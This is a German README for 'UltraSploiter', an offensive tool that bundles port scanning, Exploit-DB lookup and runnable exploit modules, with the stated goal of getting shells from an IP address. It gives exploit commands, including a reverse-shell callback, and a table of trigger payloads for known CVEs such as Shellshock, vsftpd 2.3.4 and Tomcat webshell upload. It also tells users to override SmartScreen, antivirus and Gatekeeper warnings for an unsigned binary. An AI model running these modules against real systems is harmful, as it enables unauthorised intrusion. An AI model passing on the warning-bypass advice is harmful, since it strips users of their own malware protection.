Eine einzelne Binärdatei, die einen Portscanner, den vollständigen Exploit-DB-Index (47k Einträge) und ausführbare Exploit-Module in einem Tool vereint. In Rust geschrieben, läuft auf Linux, Windows und macOS.
scannen, abgleichen, ausnutzen — eine IP rein, Shells raus.
Ein einzelnes Binary, das einen Portscanner, den vollständigen Exploit-DB-Index und eine Reihe ausführbarer Exploit-Module in einem Werkzeug vereint. Läuft auf Linux, Windows und macOS.
| Aufgabe | normalerweise | hier |
|---|---|---|
| Dienste auf einem Host finden | nmap | UltraSploiter scan <ip> |
| Exploits nachschlagen | searchsploit | UltraSploiter search <kw> |
| Sie abfeuern | msfconsole | UltraSploiter exploit <ip> <module> |

Der einfachste und beste Weg ist, einfach das vorgefertigte Binary zu nehmen und es auszuführen. Nichts zu installieren, keine Abhängigkeiten — eine eigenständige Datei.
Download von der Releases-Seite:
UltraSploiter-windows-x86_64.exe → DoppelklickUltraSploiter-linux-x86_64Achtung: Sicherheitswerkzeuge werden markiert. Windows SmartScreen und Antivirus werden das Binary wahrscheinlich warnen oder in Quarantäne verschieben — klicke auf Weitere Informationen → Trotzdem ausführen, oder füge eine Ausnahme hinzu, wenn du es behalten willst.
Doppelklicke auf UltraSploiter.exe. Das Menü öffnet sich.
Wenn SmartScreen vor einem unbekannten Herausgeber warnt (was bei jedem unsignierten Binary passiert), klicke auf Weitere Informationen → Trotzdem ausführen.
chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64
chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64
Wenn Gatekeeper es blockiert (wiederum: jedes unsignierte Binary), entweder Rechtsklick → Öffnen, oder das Quarantäne-Flag einmalig entfernen:
xattr -d com.apple.quarantine UltraSploiter-macos-arm64
Nur nötig, wenn es kein Binary für deine Plattform gibt oder du es ändern willst. Rust 1.74+ ist erforderlich.
sudo apt install build-essential # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
xcode-select --install # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh # -> ./UltraSploiter
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1 # -> UltraSploiter.exe
build.ps1 verwendet die Toolchain stable-x86_64-pc-windows-gnu, die mit
MinGW linkt — du brauchst also kein Visual Studio oder MSVC. Sie installiert diese Toolchain,
falls sie fehlt. Wenn du bereits MSVC Build Tools hast, funktioniert auch ein einfaches
cargo build --release.
Windows + GNU Hinweis:
windows-sys(von tokio hereingezogen) ruftdlltoolauf, das wiederum den Assemblerasaufruft — und die rust-mingw- Komponente liefertasnicht mit.build.ps1sucht nach einem MinGW-bin, das es enthält, in%~dp0tools\mingw64\binund%USERPROFILE%\tools\mingw64\bin, und stellt esPATHvoran, wenn es gefunden wird. Lege dort einen winlibs-Build ab, wenn du auferror calling dlltoolstößt. MSVC-Toolchains sind nicht betroffen.
Ohne Argumente bekommst du das Menü:
1) Scan a target find open ports and services
2) Search exploits keyword lookup
3) List runnable modules
4) Run an exploit pick a target and a module
5) Console advanced msf-style commands
0) Exit
UltraSploiter scan 10.0.0.5 # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4 # range, fast timing
UltraSploiter scan 10.0.0.5 -p - # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491 # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console
Unter Linux/macOS mit ./ davor (z. B. ./UltraSploiter scan 10.0.0.5).
| Flag | Bedeutung |
|---|---|
-p <spec> | top (1000), 80,443, 1-1024, - (alle) |
-T0..-T5 | Timing-Template — langsamer/leiser bis schneller/lauter |
-sU | UDP-Probe-Scan |
-sV | Dienst-/Versionserkennung (standardmäßig an) |
--no-banner | Banner-Grabbing überspringen |
--json | JSON nach stdout |
-oX <file> | XML im nmap-Stil |
Der Scanner ist asynchron (tokio): jede -T-Stufe legt fest, wie viele Sockets
gleichzeitig unterwegs sind (bis zu 8000 bei -T5), sodass er die nmap-Top-1000 in ein paar
Sekunden abdeckt. Jedes „offen" ist ein abgeschlossener TCP-Handshake, die Ergebnisse sind also exakt.
-o key=value)| Schlüssel | verwendet von | Bedeutung |
|---|---|---|
lhost, lport | Rev-Shell-Module | Callback-Adresse |
rport | Web-Module | überschreibt den HTTP-Port |
path | shellshock, struts, phpunit | Endpunkt-Pfad |
user, pass | tomcat_manager | Manager-Zugangsdaten |
core | solr_rce | Solr-Core-Name |
file | grafana_lfi | zu lesende Datei |
ssh_pubkey | redis_unauth | Schlüssel, der in authorized_keys abgelegt wird |
src, dst | proftpd_modcopy | Quelle / Ziel kopieren |
timeout | alle | Socket-Timeout in Sekunden |
search und info basieren auf dem vollständigen Exploit-DB-Index — über 47.000 Einträge
(derselbe Datensatz, den searchsploit verwendet), eingebettet ins Binary. Wenn ein Eintrag
eine CVE trägt, die ein ausführbares Modul implementiert, verknüpft info die beiden:
$ UltraSploiter info 17491
Exploit-DB 17491
description vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
codes OSVDB-73573;CVE-2011-2523
[runnable] vsftpd_234
UltraSploiter exploit <ip> vsftpd_234
| Modul | CVE | Auslöser |
|---|---|---|
vsftpd_234 | CVE-2011-2523 | :)-Benutzername → Root-Bind-Shell auf 6200 |
unrealircd_backdoor | CVE-2010-2075 | AB; <cmd> über IRC |
distcc_exec | CVE-2004-2687 | DIST-Protokoll-Compiler-Argument |
proftpd_modcopy | CVE-2015-3306 | SITE CPFR/CPTO Dateikopie |
redis_unauth | — | CONFIG SET schreibt einen Key oder Cron-Eintrag |
shellshock | CVE-2014-6271 | User-Agent: () { :; }; <cmd> |
struts2_5638 | CVE-2017-5638 | OGNL in Content-Type |
tomcat_put | CVE-2017-12615 | PUT einer JSP-Webshell |
tomcat_manager | — | Deployment eines WAR über /manager |
elasticsearch_groovy | CVE-2015-1427 | Groovy-RCE in _search |
drupalgeddon2 | CVE-2018-7600 | Form-API-Render-Callback |
phpunit_eval | CVE-2017-9841 | eval-stdin.php |
jenkins_script | CVE-2019-1003000 | unauthentifiziertes /script Groovy |
solr_rce | CVE-2019-17558 | Velocity-Template in stream.body |
grafana_lfi | CVE-2021-43798 | Plugin-Path-Traversal-Dateilesen |
webmin_backdoor | CVE-2019-15107 | password_change.cgi leitet einen Wert in eine Shell |
php_cgi_arg_injection | CVE-2012-1823 | -d auto_prepend_file über den Query-String |